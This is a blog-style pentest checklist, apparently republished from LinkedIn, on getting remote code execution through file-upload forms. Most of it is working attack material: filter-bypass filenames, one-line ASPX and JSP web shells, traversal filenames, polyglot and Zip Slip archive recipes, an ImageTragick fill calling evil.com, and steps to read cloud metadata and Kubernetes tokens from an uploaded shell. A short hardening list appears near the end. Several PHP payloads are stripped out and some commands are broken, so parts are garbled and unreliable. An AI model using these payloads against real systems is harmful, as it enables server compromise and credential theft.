File Upload RCE Testing: The Ultimate Bug Bounty Checklist for 2026

Listen to this Post

Featured Image

Introduction:

File upload functionalities are a primary attack vector for remote code execution (RCE), yet many organizations still rely on weak validations. This article dissects a professional pentester’s checklist—covering extension filtering, MIME type spoofing, magic bytes, polyglot files, and archive-based exploits—to help you systematically identify and exploit file upload vulnerabilities in modern web applications.

Learning Objectives:

– Bypass client‑side and server‑side file validation using extension, MIME, and magic‑byte tricks.
– Execute web shell and image‑processing RCE techniques across Linux and Windows environments.
– Leverage archive‑based attacks (Zip Slip, path traversal) and SVG/XML payloads for persistent access.

You Should Know:

1. Extension & MIME Type Validation Bypass

Step‑by‑step guide to trick file filters:

– Native extension: Upload `shell.php` – if blocked, try `shell.PHP` (mixed‑case).
– Double extensions: `shell.php.jpg` – some servers stop at the first or last dot.
– Trailing dots/spaces: `shell.php.` or `shell.php%20` (Windows may ignore).
– Semicolon trick: `shell.php;.jpg` – old IIS/ASP behavior.
– MIME type spoof: Use Burp Suite to change `Content-Type: image/jpeg` while uploading `shell.php`.
– Command example (Linux):
`curl -F “[email protected];type=image/jpeg” http://target/upload`
– Windows PowerShell equivalent:
`Invoke-RestMethod -Uri http://target/upload -Method Post -Form @{ file= Get-Item -Path shell.php }`

Test both client‑side (disable JS) and server‑side validation. Always check if the server re‑checks MIME after magic‑byte verification.

2. Magic Byte & Polyglot File Construction

Create files that pass header checks while executing code:
– JPEG + PHP:
`echo “FFD8FFE0” | xxd -r -p > polyglot.jpg` then append ``

`echo ‘‘ >> polyglot.jpg`

– PNG + PHP: Use a valid PNG header (`\x89PNG\r\n\x1a\n`) then add PHP code.
– Verify with `file` command:

`file polyglot.jpg` should output “JPEG image data”.

– Testing on Windows (using certutil or PowerShell):

`certutil -decodehex polyglot.hex polyglot.jpg`

Then `Add-Content polyglot.jpg ““`

Upload the polyglot; if the application processes thumbnails or metadata, the PHP code may execute via image libraries (ImageMagick, GD).

3. Filename Manipulation & Path Traversal

Force file writes to unexpected directories:

– Long filename overflow: `A`4096 + `.php` – may truncate extension.
– Unicode characters: `shell%c0%2ephp` (overlong UTF‑8).
– Directory traversal in filename: `../../../../var/www/html/shell.php`.
– Reserved names (Windows): `shell.php:` or `shell.php::$DATA` (bypass blacklist via ADS).
– Command to test traversal (Linux):
`curl -F “[email protected];filename=../../../../tmp/shell.php” http://target/upload`
– Check upload path: Inspect response JSON, `robots.txt`, or `sitemap.xml` for `/uploads/` patterns.

If traversal works, you can write a web shell directly into the web root.

4. Web Shell Upload & Execution Verification

Deploy a minimal proof‑of‑concept shell:

– PHP:

``

– ASPX (Windows IIS):

`<%@ Page Language="Jscript"%><%eval(Request.Item["c"],"unsafe");%>`

– JSP:

`<% Runtime.getRuntime().exec(request.getParameter("c")); %>`

– Verify direct access:
`curl http://target/uploads/shell.php?c=id`
– If code is served as source code (not executed), the upload directory lacks script execution permission – try moving to `/cgi-bin/` or using double extensions.

Use `time`‑based detection: `` and measure response latency.

5. Image Processing & SVG‑Based RCE

Exploit dynamic image manipulation libraries:

– Thumbnail generation (ImageMagick): Upload a file named `exploit.svg` with:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg onload="alert(1)" xmlns="http://www.w3.org/2000/svg">
<script>alert('XSS')</script>
</svg>

– ImageTragick (CVE‑2016‑3714):
`push graphic-context` + `viewbox 0 0 640 480` + `fill `url(https://evil.com/backdoor.php?`kill`)” – leads to RCE.
– PDF conversion: Upload a PDF with embedded JavaScript – if converted to image, the JS may be stripped, but metadata parsing can execute commands.
– Command to test SVG rendering:
`curl -X POST http://target/upload -F “[email protected]”` then check any `/tmp/` conversion logs.

6. Archive Upload & Zip Slip Attack

Exploit insecure archive extraction:

– Create malicious ZIP (Linux):

`zip -r payload.zip shell.php`

then rename inside: `echo “../../../var/www/html/shell.php” | zip -u payload.zip -`

or use `zip –symlink` to traverse.

– Windows PowerShell method:

`Compress-Archive -Path shell.php -DestinationPath payload.zip`

then modify with .NET `ZipArchive` to add `..\..\web\shell.php`.

– Test for Zip Slip: Upload `payload.zip` that extracts to `../../web/shell.php`. If the app uses `unzip` without `-d` sanitization, you overwrite critical files.
– Tar/Gzip variants:
`echo “../../../tmp/evil” | tar -cvf payload.tar –transform ‘s|.|../../../tmp/evil|’ shell.php`

Always monitor extraction directory: if the app extracts to `/tmp/uploads/user/`, attempt directory traversal to reach web‑accessible paths.

7. API Security & Cloud Hardening for File Uploads

Mitigations and cloud‑specific bypasses:

– AWS S3 presigned URLs – test if you can upload a polyglot that gets automatically processed by Lambda (image resizing).
– Azure Blob Storage – check for misconfigured `Content-Type` that allows HTML/JS uploads (leading to stored XSS, then RCE via CSRF).
– Kubernetes volume mounts – if uploads land in a pod’s ephemeral storage, test path traversal to `/var/run/secrets/kubernetes.io/serviceaccount/token`.
– Command to test cloud metadata (if upload path is predictable):
`curl http://169.254.169.254/latest/meta-data/` from uploaded PHP script.
– Hardening advice:
– Store files outside webroot.
– Generate random filenames and disable script execution in upload directories via `.htaccess` (Apache) or `web.config` (IIS).
– Use Content‑Security‑Policy `script-src ‘none’` for SVG/HTML uploads.

What Undercode Say:

– Key Takeaway 1: File upload RCE is not just about dropping a `shell.php` – modern bypasses require chaining extension tricks, magic bytes, and archive path traversals.
– Key Takeaway 2: Image processing libraries (ImageMagick, Ghostscript, FFmpeg) and SVG parsers remain underestimated entry points for remote code execution in production environments.

Analysis (10 lines): The provided checklist aligns with real‑world bug bounty findings where file upload features are consistently among top‑10 critical risks. Many pentesters stop at simple extension filters, missing the rich attack surface of archive extraction (Zip Slip) and media conversion endpoints. From a red team perspective, combining MIME spoofing with polyglot files gives a high success rate against applications that only validate file headers. Cloud environments introduce new vectors – for example, serverless image resizing often executes user‑supplied code without sandboxing. On the defensive side, implementing allowlisting of extensions (not denylisting), storing files with random names outside the webroot, and using a dedicated antivirus scanner for archives would block most of these attacks. Moreover, disabling dynamic execution in upload directories via `Options -ExecCGI` (Apache) or removing NTFS execute permissions (Windows) is essential. The checklist’s inclusion of SVG testing is crucial because many developers forget that XML parsers can trigger SSRF or XXE leading to RCE. Finally, regular expression filters for directory traversal sequences (`\.\./`) often fail when encoded twice – hence a layered validation approach is mandatory.

Expected Output:

Introduction:

File upload functionalities are a primary attack vector for remote code execution (RCE), yet many organizations still rely on weak validations. This article dissects a professional pentester’s checklist—covering extension filtering, MIME type spoofing, magic bytes, polyglot files, and archive-based exploits—to help you systematically identify and exploit file upload vulnerabilities in modern web applications.

What Undercode Say:

– Key Takeaway 1: File upload RCE is not just about dropping a `shell.php` – modern bypasses require chaining extension tricks, magic bytes, and archive path traversals.
– Key Takeaway 2: Image processing libraries (ImageMagick, Ghostscript, FFmpeg) and SVG parsers remain underestimated entry points for remote code execution in production environments.

Prediction:

+1 File upload testing will shift toward AI‑driven fuzzing that automatically generates thousands of polyglot variations and learns application behavior from response headers.
+1 Cloud providers will introduce native file‑upload sandboxes with microVM isolation, reducing the impact of ImageMagick‑type RCEs.
-1 As more applications adopt serverless image processing, attackers will exploit cold‑start delays to execute malicious code before the runtime hardens the environment.
-1 Traditional WAF signatures for extension and MIME bypasses will become obsolete, forcing defenders to implement full content disarm and reconstruction (CDR) pipelines.
+1 Bug bounty platforms will increase rewards for chained file‑upload + path traversal findings, recognizing them as critical business logic flaws rather than simple misconfigurations.

🎯Let’s Practice For Free:

🎓 Live Courses & Certifications:

[Join Undercode Academy for Verified Certifications](https://undercode.co.uk/certifications/)

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[[email protected]](mailto:[email protected])
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

IT/Security Reporter URL:

Reported By: [Deepmarketer File](https://www.linkedin.com/posts/deepmarketer_file-upload-rce-testing-checklist-pentesting-ugcPost-7467419572275412992-J_Ju/) – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

[💬 Whatsapp](https://undercode.help/whatsapp) | [💬 Telegram](https://t.me/UndercodeCommunity)

📢 Follow UndercodeTesting & Stay Tuned:

[𝕏 formerly Twitter 🐦](https://x.com/undercodeupdate) | [@ Threads](https://www.threads.net/@undercodetesting) | [🔗 Linkedin](https://www.linkedin.com/company/undercodetesting/) | [🦋BlueSky](https://bsky.app/profile/undercode.bsky.social)